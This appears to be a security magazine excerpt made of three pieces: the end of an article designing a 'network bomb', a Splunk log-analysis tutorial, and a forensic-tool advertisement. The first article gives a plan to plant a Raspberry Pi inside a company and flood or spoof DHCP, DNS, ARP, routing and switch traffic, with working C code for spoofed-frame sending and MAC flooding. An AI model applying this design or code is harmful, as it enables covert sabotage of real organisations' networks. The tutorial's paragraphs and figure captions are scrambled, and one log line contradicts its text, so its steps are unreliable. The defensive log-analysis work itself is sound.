Now this just allows us to read packets, but we can write them as well, using functions such as sscanf to fill the buffer with the values we want before the paired sendto call is made. This makes this mechanism the perfect tool for spoofing, or for creating malicious packets that exploit weaknesses in the TCP/IP protocols to create a denial of service attack that can destroy a network. Let's look at a few potential attacks in what we will refer to as our network bomb.
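As a sketch of that transmit side, the fragment below hand-builds a minimal Ethernet frame and pushes it out through the same PF_PACKET raw socket with sendto; the interface name, the spoofed source MAC and the payload are illustrative assumptions rather than values from the article.

#include <string.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <net/if.h>

void send_spoofed_frame(int sock) {
    unsigned char frame[60];                                 /* minimum frame size */
    unsigned char src[6] = {0x00,0x11,0x22,0x33,0x44,0x55};  /* spoofed source MAC */

    memset(frame, 0, sizeof(frame));
    memset(frame, 0xff, 6);                  /* destination: broadcast */
    memcpy(frame + 6, src, 6);               /* spoofed source MAC     */
    frame[12] = 0x08; frame[13] = 0x00;      /* EtherType: IPv4        */
    /* an IP header and payload would be built into frame + 14 here */

    struct sockaddr_ll addr;
    memset(&addr, 0, sizeof(addr));
    addr.sll_family  = AF_PACKET;
    addr.sll_ifindex = if_nametoindex("wlan0");   /* assumed device name */
    addr.sll_halen   = ETH_ALEN;
    memcpy(addr.sll_addr, src, ETH_ALEN);

    sendto(sock, frame, sizeof(frame), 0,
           (struct sockaddr *)&addr, sizeof(addr));
}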

The Network Bomb Application


Overview
The objective of this application is to cause chaos on a company network and eventually bring down the whole network in a location. The code is broken down into a number of discrete attack vector elements that attack the network infrastructure by making use of vulnerable parts of standard network protocols to confuse PCs, firewalls, VoIP telephones and switches. Although TCP/IP and Ethernet are attacked, there is no visibility of the device on the network, as the sockets API PF_PACKET and ioctl promiscuous mode accesses are used to spoof the MAC and IP addresses. Some parts of the attack cause inconvenience and confusion for a period of time and then move on, with the aim of occupying IT and network staff whilst the rest of the attack progresses. The code is written in C and consists of a small number of threads, one for each attack vector, mediating access to the promiscuous PF_PACKET socket via a protected queue, with a final thread running at a slightly higher authority that takes packets or frames from the queue and transmits them.

Assumption
Most companies trust the wired LAN connections at their user sites. So, gaining physical access to the target site under the premise of a meeting, a delivery, or as cleaning staff, and deploying a small, cheap, credit-card-sized PC running Linux (such as a Raspberry Pi) under a desk, is all that is needed to deploy the bomb to a location. The code is activated remotely or on a schedule, and must run under the root account. Similarly, for wireless attacks, the use of promiscuous mode means that the card does not need to connect to the network, but can spoof the unprotected early network connection negotiations to perform an attack, or can connect to a network access point with no or limited security protection. For the most damage, a wired connection is required.

Attack Implementation
Discover Utility Function Thread
This function listens continually for broadcasts and builds up a list of MAC addresses to reuse, DHCP server addresses, existing IP addresses (ordered by busiest, so a packet count is maintained for each address), and existing DNS servers. It simply uses the offsets in the known Ethernet frames and packet headers, creates a network structure, and adds the data to linked lists of IP and MAC addresses.

Attack 1 - DHCP
DHCP works by using the Discover, Offer, Request, Accept request-response packets, with the first two sent as broadcasts. The thread will listen for active TCP/IP addresses and for Discover packets, and will then respond with a random IP address in the packet source address and offer the address of an already active system. When the client requests that address it will grant it. This will cause issues for both the active system and the new client; and when the new client tries to call the random DHCP address, the code will respond as if it were the DHCP server. This code will also work with relay agents.

Attack 2 - DNS
This thread will listen for DNS servers responding to requests AND will look for DNS blocks in DHCP packets. To handle switches blocking the view of other communications, it will first listen for a MAC address to spoof in a DHCP request; if it sees none, it will use a dummy MAC address to make the DHCP request. When it has the IP addresses of the DNS servers, it will occasionally start returning random IP addresses whilst impersonating the DNS server.

Attack 3 - ARP
When ARP broadcasts are spotted by this thread, a MAC address of a different host will be returned to the caller.

Attack 4 - Switch
This thread will periodically send large batches of Ethernet frames with every MAC address it has discovered, and will spoof addresses close to those it has discovered, to fill up the switch MAC address cache and potentially cause redirection of packets. This works because Ethernet switches examine the source MAC address of every call and broadcast and store it in the switch addressing table, so that frames addressed to that target are copied out only through the port it is connected to; spoofing different values will fool the switch into thinking the given MAC address is connected to that port. A rough sketch of this flood appears after the attack list.

Attack 5 - Cisco CDP Neighbour Attack
This attack thread periodically spoofs Cisco Discovery Protocol (CDP) packets to confuse the network infrastructure. The CDP protocol is used by Cisco, and some competitors, to build up a topology map of the network, so this will confuse the topology map if the appropriate CDP packets are copied to emulate particular devices and spoofed.

Attack 6 - OSPF Attack
This attack thread periodically spoofs OSPF packets, based on the configuration traffic it monitors, to confuse the network routing tables. Proper security and configuration should prevent this attack from working, but often network engineers assume that the environment inside their company is safe.

Attack 7 - RIPv2 Attack
This attack thread periodically spoofs RIPv2 packets, based on the configuration traffic it monitors, to confuse the network routing tables. Again, proper security and configuration should prevent this attack from working, but often network engineers assume that the environment inside their company is safe.

Attack 8 - BGP Attack
This attack thread periodically spoofs BGP packets, based on the configuration traffic it monitors, to confuse the network routing tables. As with the previous two attacks, proper security and configuration should prevent this from working, but often network engineers assume that the environment inside their company is safe.

Attack 9 - Invalid TCP Packet Counter Reset
Periodically this thread will open a socket to any open port (usually an MS standard port such as TCP 139), will gradually send out-of-sequence packets, and will request resends. This will confuse the network and start to increase error rate counters on network hardware, which will lead to inappropriate management alerts for the network infrastructure and possibly inappropriate remedial action, or, in extreme circumstances, will lead to the network infrastructure deactivating itself.
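As a rough illustration of Attack 4, the loop below floods a switch's address table by transmitting frames with randomised source MACs; it reuses the PF_PACKET raw socket opened earlier, and the interface name, frame count and frame contents are illustrative assumptions.

#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <net/if.h>

void flood_cam_table(int sock, int count) {
    unsigned char frame[60];
    struct sockaddr_ll addr;

    memset(&addr, 0, sizeof(addr));
    addr.sll_family  = AF_PACKET;
    addr.sll_ifindex = if_nametoindex("eth0");    /* assumed wired device */
    addr.sll_halen   = ETH_ALEN;

    for (int i = 0; i < count; i++) {
        memset(frame, 0, sizeof(frame));
        memset(frame, 0xff, 6);                   /* broadcast destination */
        for (int j = 0; j < 6; j++)
            frame[6 + j] = rand() & 0xff;         /* random source MAC...  */
        frame[6] &= 0xfe;                         /* ...kept unicast, so each
                                                     one fills a new table entry */
        frame[12] = 0x08; frame[13] = 0x00;       /* EtherType: IPv4 */
        memcpy(addr.sll_addr, frame + 6, ETH_ALEN);
        sendto(sock, frame, sizeof(frame), 0,
               (struct sockaddr *)&addr, sizeof(addr));
    }
}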

Conclusion

Many other types of attack are possible in addition to the above, and some of the above may not even work if the network is properly configured and managed. There are, however, many possible variations that build upon the above. The key point to take away from this article is the risk that the sockets PF_PACKET, SOCK_RAW combination represents, and the ease with which it can be used for snooping or to cause issues. So, always assume that internal networks are unsafe and build security into every aspect of network design.

Colin Renouf
is an Enterprise Architect and author in the UK financial services industry, working with security, Java/JavaEE, networking, Unix/Linux and general architecture. He also more than dabbles in the worlds of psychology, human learning, astronomy and particle physics, having studied IT, aeronautical engineering, social sciences and more in his life as an eternal part-time student. When not working, writing or being verbally abused by his children, he loves photography, singing, playing guitar, drinking wine, and chatting for hours on end with his friends elsewhere in the world, certain of whom he competes with, but would love to spend more real time in the same country with. Colin is always happy to help anyone and loves fine technical debate that involves improving the state of the industry and mankind.

Web Server Log Analysis


Detecting Bad Stuff Hitting Your Web Server
Kim Halavakoski

Web Servers on the Internet are under constant attack. Defending your web server requires vigilant response times and in-depth log analysis to be able to detect, remediate and track ongoing attacks. WAFs are today a common tool in defending high-profile websites. One often forgotten aspect of any technology is log analysis. Products and technologies are often installed as a countermeasure to observed attacks, but the really valuable part is usually forgotten: log analysis. Without properly analysing the logs, defending against the ever-changing threat landscape and evolving attack methods can be challenging. This article will show some basic methods, tools and products for analysing the logs and detecting the bad stuff targeting your website.

Running a website is fairly easy today. Websites are hosted by various hosting providers and are relatively easy to set up, even for the novice webmaster/sysadmin. I will not go into detail on how to set up a website in this article; instead I will take a quick dip into the world of log management. In this article I will show how to do some simple log analysis for a web server. I will use Splunk (http://www.splunk.com) for analysing the logs and setting up alerts and reports that will help in detecting bad stuff hitting the website.

# rpm -i splunk_version_package_name.rpm

To install Splunk in a non-default directory, run the installation with the --prefix flag:
# rpm -i --prefix=/another/directory/ splunk_version_package_name.rpm

Installing Splunk

To upgrade an existing installation of Splunk installed in the /opt directory:


# rpm -U splunk_version_package_name.rpm

There are various log management solutions on the market at various price levels. In this article I have used Splunk. Splunk is a commercial log engine that eats logs and makes them searchable and reportable. Splunk has a free version that can index 500 MB per day; if more indexing power is needed, you'll need to get a commercial license. Installing Splunk is easy. It comes packaged for Windows, Linux, OS X, Solaris, AIX, FreeBSD and HP-UX. Just install the Splunk package as you would normally install a package on the OS you use. Installing Splunk on an RPM-based system goes like this. To install Splunk in the default /opt directory, run the following command:

To upgrade an existing installation of Splunk that was installed in a different directory use the --prefix flag:
# rpm -U --prefix=/opt/existing_directory splunk_version_package_name.rpm

You should then have Splunk installed and can start indexing log files and doing log analysis on your logs. You can now start Splunk by running the following command:

# $SPLUNK_HOME/bin/splunk start

If you want to start Splunk automatically at boot time run the following command:
./splunk enable boot-start

Configuring Splunk

To get data indexed and searchable, Splunk needs to ingest some log data. The easiest way is to point Splunk at the directory where the log files live and start indexing the files in that directory. There are many ways of adding data to Splunk. To add data, go to Splunk Manager and then click Data Inputs:

Figure 5: Preview data

Figure 1: Data inputs

Then on the next screen click Add data:

Splunk will then let you preview the log files you are about to index and finally let you configure some settings for the indexed files. Just proceed and click Save on the last page to index the logs. Splunk is very versatile: it can index almost any data on disk and even from the network, function as a regular syslog daemon, and receive data from other Splunk instances. Pretty nice! For more detailed instructions on Splunk, please see the tutorial documentation pages at http://docs.splunk.com/Documentation/Splunk/latest/User/WelcometotheSplunktutorial

Figure 2: Add data

Analysing the log files

Then proceed and click A file or directory of files to point Splunk at a directory where the log files exist:

The most useful feature of Splunk is analysing and correlating logs. If you have ever searched log files on a Linux server using grep, uniq, awk, sed and similar tools to mangle the logs to your liking, then you will love Splunk. It's like having all those tools, but on steroids, in your browser! It's like Google for your logs! Here is the main search screen in Splunk. It looks pretty normal and boring, and there is nothing special here (yet):

Figure 3: Adding data to splunk

Figure 6: Splunk main search screen

Next, choose the first option, Consume any file on this Splunk server, and click Next:

This is where most of the magic will happen. Now it is time to dive into some log searching and correlating. We are supposed to do some web server log analysis, so one thing to look at might be web server HTTP status codes. I have configured my apache2 web server with some extended logging to catch almost everything that apache2 can spit out. Here is my LogFormat directive in apache2.conf:
LogFormat "remote-host=%h remote-ip=%a canonical-port=%p response-size=%B request-time-taken=%D request-protocol=%H keepalive=%k request-method=%m process-id=%P query-string=%q request-line=%r handler=%R http-status-code=%s http-request-time=%t request-time-taken=%T remote-user=%u http-request-url=%U servername-canonical=%v servername=%V http-connection-status=%X http-bytes-received=%I http-bytes-sent=%O http-referer=\"%{Referer}i\" http-user-agent=\"%{User-Agent}i\"" extended

Figure 4: Add files to be indexed
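With this format, a single access-log event comes out as one long line of key=value pairs, roughly like the following (abbreviated, and with values invented purely for illustration):

remote-host=192.0.2.10 remote-ip=192.0.2.10 canonical-port=80 response-size=5123 request-time-taken=15423 request-protocol=HTTP/1.1 request-method=GET http-status-code=200 http-request-url=/index.html http-user-agent="Mozilla/5.0"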

Then finally add the path to the directory or log file you would like to be splunked:

As you can see, I am logging almost all possible attributes, and in key=value pairs, which makes Splunk field extraction much easier, as you will see in a minute. So how do I find out what status codes are present in my web server logs? With the LogFormat above, just type http in the search field and hit enter to see some results for the keyword http from the logs:

Figure 9: HTTP status code timechart

Figure 7: Searching for logs containing http

And voilà! There you can see how the HTTP status codes are dispersed in the log over the last 24 hours. Pretty neat, or what? To optimize the chart you can stack the status code values in one column, instead of having one column per code, by clicking Options and choosing stacked mode:

So now we can see logs containing the keyword http. The timeline with columns shows the occurrence of http in the logs over a time period. The area on the left below shows the discovered fields. Here I have added some discovered fields by clicking edit and adding interesting fields to my Splunk results window.

Figure 10: Chart stacked mode selection

With stacked mode the columns look nicer, compress more data into the same view, and are generally more pleasant to look at. I am no visualization expert, just an avid practitioner. If you want good advice on data visualization, then go get Raffael Marty's Applied Security Visualization and Greg Conti's Security Data Visualization books, which go into deep detail about security data visualization theory.

Figure 8: Add extracted fields to the search

I have chosen the discovered fields http_status_code, http_bytes_received, http_bytes_sent, http_request_time, http_request_url and http_user_agent. You can see that these field names match the Apache2 LogFormat directive that I configured. You can choose whatever fields you like; they will show as fields in the main search view and can also be used in Splunk searches. So if we now want to see the HTTP status codes, we can easily do that by searching for http_status_code; but now we'll add a nice twist to the search to get a visualization of what status codes are present over a time period. Use the following search query in the search window and hit enter:
http | timechart count by http_status_code
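If you prefer a plain table to a chart, a stats variant of the same search (standard SPL) returns the totals directly:

http | stats count by http_status_code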

Figure 11: HTTP status code timechart - stacked

From this graph we can easily spot abnormal outliers in the logs. What are those 404 errors that stick out? Let's have a look! Just click on the chart and Splunk will adjust the search to the specific time and HTTP status code you clicked on. In this case, clicking on the purple 404 column will apply the following search term:
http http_status_code=404

And show the results of that search:

Now let's dive into some more serious features, analysis and correlation. Splunk also has the ability to do File Integrity Monitoring (FIM), which is a way of tracking changes to files on the system. If a file is modified, alarms can be triggered. This becomes useful if one wants to track what is going on in the system and whether somebody is making unauthorized changes to configuration files, web pages or other critical files. The FIM feature is configured by adding an fschange stanza to the Splunk configuration file /opt/splunk/etc/system/local/inputs.conf:
[fschange:/etc/]
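The stanza can be tuned further, for example with a polling interval and recursion control. The attribute names below follow my reading of the Splunk documentation of that era, so treat this as a sketch and verify them against your version:

[fschange:/etc/]
pollPeriod = 60
recurse = true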

Figure 12: HTTP status code timechart - clicked results

In this case it seems to be some missing attachments on my web server that somebody has tried to access. Other interesting information to search for in web server logs includes the http_referer and http_user_agent strings. Who is referring to your website, and what do the HTTP User-Agent strings in your logs tell you about your users' web browser preferences? Searching for http_referer and negating my own domain from the results gives a nice overview chart showing what referers are hitting my website. Here I have chosen not to include my own domain's referers in the results by using the NOT operator to negate results containing blackcatsec:
http NOT http_referer=*blackcatsec* | timechart count by http_referer

This makes Splunk track all changes to files in the /etc directory. In order to track all commands and behaviour on my system, I am using a program called snoopy. Snoopy is a library that gets preloaded into every executed file on a Linux system; the library is added to the /etc/ld.so.preload file, and after that all system-level execs are logged. Let's take a look at what we can find in these logs. All FIM events are logged with source=fschangemonitor, so searching for that source will show all file system changes:
source=fschangemonitor
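As an aside, enabling snoopy is typically just a matter of preloading the library; a sketch, assuming it was installed to /usr/lib/snoopy.so (the path differs per distribution):

# echo /usr/lib/snoopy.so >> /etc/ld.so.preload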

Figure 15: Splunk File Integrity Monitoring Logs

Figure 13: HTTP Referers timechart

Searching for HTTP User Agents is equally easy:


http | timechart count by http_user_agent
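Rare User-Agent strings are often the interesting ones, since scanners and attack tools tend to show up only a handful of times; the standard SPL rare command surfaces them quickly:

http | rare http_user_agent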

Here we can see files that have been changed in /etc during the last 30-day search span. One thing that pops out is the 2790 events on September 3rd. What happened on that day? Clicking on the column in the timeline will again modify the search to include only events from that day. What immediately pops out is the /etc/compromised.file that has been added to the filesystem. What is that about? Who did that? By searching for compromised.file in the search field we can now get a listing of all log events containing compromised.file:

Figure 14: HTTP User Agent Timechart

As you can see, these kinds of tools can be very effective when searching logs for anomalies and weird malicious behaviour.

Figure 16: Splunk File Integrity Monitoring Details for /etc/compromised.file

Here we can see from the snoopy logs that the user root touched /etc/compromised.file and then proceeded to edit the file:

Sep 3 23:06:22 panther snoopy[3893]: [uid:0 sid:22035 tty:/dev/pts/0 cwd:/etc filename:/usr/bin/touch]: touch compromised.file

immediately followed by Splunk's fschange event:

Mon Sep 3 23:06:24 2012 action=add, path=/etc/compromised.file, isdir=0, size=0, gid=0, uid=0, modtime=Mon Sep 3 23:06:22 2012, mode=rw-r--r--, hash=

Root then proceeded to edit and modify the file, again detected by Splunk:

Sep 3 23:07:12 panther snoopy[4093]: [uid:1000 sid:22035 tty:/dev/pts/0 cwd:/etc filename:/usr/bin/vi]: vi compromised.file

Mon Sep 3 23:07:26 2012 action=update, path=/etc/compromised.file, isdir=0, size=0, gid=0, uid=0, modtime=Mon Sep 3 23:06:22 2012, mode=rw-rw-rw-, hash=, chgs=mode

Log correlation

One useful feature in Splunk is the ability to correlate logs from various sources. One simple and effective way of correlating different logs over a narrow time period is to first drill down on a specific event to have Splunk narrow down the timeline. Then, when the timeline is focused on a specific period in time, remove the search terms. Splunk will then show all events received during that specific time frame. This gives you an opportunity to see what else happened during the time you are focusing your search on. Perhaps you searched on a firewall event and want to see what else happened around that time. Did something get logged in apache, postfix, or some other daemon running on your server? Did the specific IP address that hit your web server do something else? Perhaps it scanned your server and you can see traces of the scan in your firewall logs?

Alerts

Another nice feature is alerting. Splunk can be set up to send alerts for saved searches. In the following example I have set up an email alert for each time my server running sshguard automatically blocks an IP address using iptables after a predefined number of failed logins. First I search for all sshguard blocking events:
sshguard blocking

From the snoopy logs we can see that the uid is 1000 and the sid is 22035. Searching for this information gives us a pretty clear picture of what happened on the system:

Figure 18: SSH Guard blocking
Figure 17: Splunk File Integrity Monitoring Details for /etc/compromised.file with sid
Sep 3 22:27:00 panther snoopy[24092]: [uid:1000 sid:22035 tty:/dev/pts/0 cwd:/home/khalavak filename:/usr/bin/sudo]: sudo su

Sep 3 23:06:17 panther snoopy[3887]: [uid:1000 sid:22035 tty:/dev/pts/0 cwd:/etc filename:/usr/bin/sudo]: sudo touch compromised.file

Sep 3 23:06:34 panther snoopy[3911]: [uid:1000 sid:22035 tty:/dev/pts/0 cwd:/etc filename:/usr/bin/sudo]: sudo chmod 666 /etc/compromised.file

Sep 3 23:07:12 panther snoopy[4093]: [uid:1000 sid:22035 tty:/dev/pts/0 cwd:/etc filename:/usr/bin/vi]: vi compromised.file

From these logs we can see that the user khalavak became root by using sudo and then proceeded to touch, chmod and vi the suspicious file.

Then create an alert by clicking Create and then Alert. Fill in the alert name and proceed to fill in the details and the email address where the alert should be sent when a match is found in the logs.

Figure 19: Configuring Alert Schedule


Figure 20: Configuring Alert Actions

Figure 21: Configure Alert Sharing

Figure 22: Alert Saved Successfully

Creating alerts for interesting and known issues helps in building good situational awareness and can help cut down the remediation time for an incident.

Conclusion

Log management and analysis can be difficult and time consuming. It can be very hard to do without the right people, who possess the right mindset and utilize the right tools. Tools that help administrators and security analysts easily visualize and correlate log events can be extremely useful. They help log analysts find and remediate issues hidden in the vast amount of logs generated by servers. But one has to remember that the tool alone is not good enough; we still need people to do the actual log analysis and decide what needs to be investigated: what is a false positive, what is good and what is bad. Tools will take us half the way, but the people analysing the logs are the ones who make the difference.

Kim Halavakoski
is the CSO of an undisclosed financial services provider, with a solid background in network security management and architecture. He also dreams of doing pentesting professionally in the near future. When not doing security work, he enjoys spending time with his fiancée, 3 children and 5 cats. Hobbies include, but are not limited to, photography, robotics, RC airplanes, quadcopters and electronics.

Special Edition for Forensic Professionals:


The Most Advanced and Effective New Tools from Atola Technology
Atola Technology deeply values each customer and strives to offer only the latest innovative technologies for the data recovery professional. Atola has specifically designed two new powerful data recovery tools, with intuitive ease of use, for forensic specialists: the Atola Forensic Imager and the Atola Bandura.

Figure 1. Atola Forensic Imager

The Atola Forensic Imager is a high-quality professional tool designed to meet all expectations in advanced forensic operations. It is an all-in-one solution that easily works with damaged or unstable hard disk drives. It combines a fast imager with strong data recovery capabilities for creating accurate forensic images. The powerful Atola Imaging Software is bundled with the Atola DiskSense Ethernet Unit, which utilizes the most efficient interface connections. This professional tool has been developed with the ability to customize every step: key parameters can be adjusted during the imaging process to make it more effective and successful for each specific case. Quick and accurate erasing of hard drives works at maximum speed, using any specified HEX pattern to overwrite the sectors; it can also execute the Security Erase function and perform Zero-Fill, NIST 800-88 and DoD 5220.22-M compliant wiping. The Case Management System works automatically, recording all important data, such as date, time and hash values, in one place; archives of all past cases are stored on the host PC. The Automatic Password Removal function removes any user- and master-level ATA password from a locked hard drive and displays the password to the technician. The Atola Forensic Imager is one of the best solutions for a forensic professional. It guarantees careful attention to detail, precise data acquisition, and strong, reliable security. All you need is in one tool!

Main features:
Imaging damaged drives
Calculating checksum on the fly (MD5, SHA1, 224, 256, 384, 512)
Wiping/erasing:
  DoD 5220.22-M method
  NIST 800-88 method
  Security Erase
  Fill with pattern
  Zero fill
Automatic Password Removal
Automatic Case Manager

Main adjustable imaging parameters:
Calculate checksum on the fly (MD5, SHA1, 224, 256, 384, 512)
Disable GList with auto reallocation
HEX pattern to fill skipped sectors (00 by default)
Image file size (chunk size)
Timeout length (after failed sector read attempt)
Number of sectors to skip after failed read attempt
Number of imaging passes
Apply Read-Long command on last pass
Reduce HDD operating speed to PIO mode
Copy direction (forward/linear or reverse)
Specify read/write heads to transfer from
Abort duplication after X amount of HDD power cycles.

Atola Bandura

The Atola Bandura is a unique stand-alone (no PC required), 2-port HDD duplicator, wiper and tester. This indispensable tool provides powerful high-speed imaging, automatic testing, comparison, and secure data wiping. It easily works with damaged disk drives and properly handles all bad sectors. The Bandura system features an intuitive touch screen user interface that allows launching any task in just 2 touches, making all forensic operations easy and natural.

Main features:
Properly handles bad sectors and even severely damaged hard drives
Super-fast on non-defective drives, functioning at speeds up to 16 GB/min (265 MB/s)
Multi-pass imaging (gets most data as quickly as possible on the first pass, then reads the rest)
Ability to stop/resume duplication sessions anytime
Disk diagnosis: PCB, head stack, firmware, SMART, media, file system checks
Checksum calculation: MD5, SHA1, SHA224, SHA256, SHA384, SHA512
Bad sector repair function
HPA and DCO max address management
Secure disk erasing with custom patterns at fast speeds up to 17 GB/min (280 MB/s)
Super-easy to use, with a 3.3-inch full color touch screen display

Main forensic applications:
Recovering data from damaged hard drives
Secondary duplication tool to free up more expensive tools for other tasks
Testing disk drives for failures
Secure data destruction (disk wipe)
Cloning only occupied sectors (quick cloning)
1:1 write-protected data acquisition
Disk comparison (locate sectors that differ on two drives)

Don't miss a chance! Choose your own Atola tool! For more information on Atola Technology and their industry-leading professional tools, visit www.atola.com

Figure 2. Atola Bandura
